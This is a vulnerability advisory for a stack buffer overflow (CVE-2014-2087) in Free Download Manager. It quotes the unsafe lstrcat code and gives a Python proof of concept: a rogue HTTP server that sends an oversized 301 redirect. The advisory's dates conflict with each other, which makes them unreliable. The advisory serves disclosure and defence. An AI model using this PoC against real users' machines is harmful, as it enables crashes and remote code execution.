Get in touch

Free Download Manager CDownloads_Deleted::UpdateDownload() Buffer Overflow Remote Code Execution

Feb 13, 2014 · By Julien Ahrens

ADVISORY INFORMATION

  • Product: Free Download Manager
  • Vendor URL: https://www.freedownloadmanager.org
  • Type: Stack-based Buffer Overflow [CWE-121]
  • Date found: 2014-02-20
  • Date published: 2014-02-13
  • CVSSv2 Score: 9,3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
  • CVE: CVE-2014-2087

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

Free Download Manager v3.9.3 build 1360 (latest) Free Download Manager v3.8 build 1173 Free Download Manager v3.0 build 852 and other older versions may be affected too.

VULNERABILITY DETAILS

A stack-based buffer overflow vulnerability has been identified in the Free Download Manager.

The application parses download requests, which are added to the download queue, but does not properly validate the length of the complete download queue object when it’s removed from the queue by the user. The following function from fdm.exe (source file: Downloads_Deleted.cpp) is triggered on deletion:

void CDownloads_Deleted::UpdateDownload(int iItem)

This function reads the filename of the download object using CDownloads_Tasks::GetFileName into szFile and adds the whole URL value as a description (in brackets) via an insecure strcat() sequence to szFile during the queue deletion process.

Since the application follows HTTP 301 redirects, an attacker who controls the target HTTP server is able to send arbitrary long filename values to exploit this flaw. If the complete name of the queued download exceeds the size of szFile (10000 bytes), strcat() writes outside the expected memory boundaries.

This leads to a stack-based buffer overflow with an overwritten SEH chain or return points, resulting in remote code execution. Successful exploits can allow remote attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in a denial-of-service condition.

This vulnerability is also exploitable locally via “File->Import->Import list of downloads”

VULNERABLE CODE PART

// Downloads_Deleted.cpp

void CDownloads_Deleted::UpdateDownload(int iItem) {

    vmsDownloadSmartPtr dld = (fsDownload*)GetItemData (iItem);

    CHAR szFile [10000];
    CDownloads_Tasks::GetFileName (dld, szFile);
    lstrcat (szFile, " (");
    lstrcat (szFile, dld->pMgr->get_URL ());
    lstrcat (szFile, ")");
    SetItemText (iItem, 0, szFile);

[..] }

PROOF-OF-CONCEPT (PYTHON)

#!/usr/bin/python from socket import * from time import sleep

host = "192.168.0.1" port = 80

s = socket(AF_INET, SOCK_STREAM) s.bind((host, port)) s.listen(1) print "\n[+] Listening on %d ..." % port

cl, addr = s.accept() print "[+] Connection accepted from %s" % addr[0]

junk0 = "\x43" * 9000

payload = junk0

buffer = "HTTP/1.1 301 Moved Permanently\r\n" buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n" buffer += "Server: Apache/2.2.22 (Debian)\r\n" buffer += "Location: "+ payload + "\r\n" buffer += "Vary: Accept-Encoding\r\n" buffer += "Content-Length: 8000\r\n" buffer += "Keep-Alive: timeout=5, max=100\r\n" buffer += "Connection: Keep-Alive\r\n" buffer += "Content-Type: text/html; charset=iso-8859-1\r\n" buffer += "\r\n" buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n" buffer += "<html><head>\n" buffer += "<title>301 Moved Permanently</title>\n" buffer += "</head><body>\n" buffer += "<h1>Moved Permanently</h1>\n" buffer += "<p>The document has moved <a href=\""+payload+"\">here</a>.</p>\n" buffer += "</body></html>\n"

print cl.recv(1000) cl.send(buffer) print "[+] Sending buffer: OK\n"

sleep(1) cl.close() s.close()

SOLUTION

None

REPORT TIMELINE

  • 2014-02-20: Discovery of the vulnerability
  • 2014-02-21: Vendor Notification #1 with preset disclosure date (2014-03-09)
  • 2014-02-24: MITRE assigns CVE-2014-2087
  • 2014-02-25: Vendor Notification #2
  • 2014-02-26: Vendor Notification #3
  • 2014-03-05: Vendor Response
  • 2014-03-05: Vulnerability details sent to vendor
  • 2014-03-09: RCE Security asks for a status update
  • 2014-03-13: No response from vendor
  • 2014-03-13: Full Disclosure according to disclosure policy

REFERENCES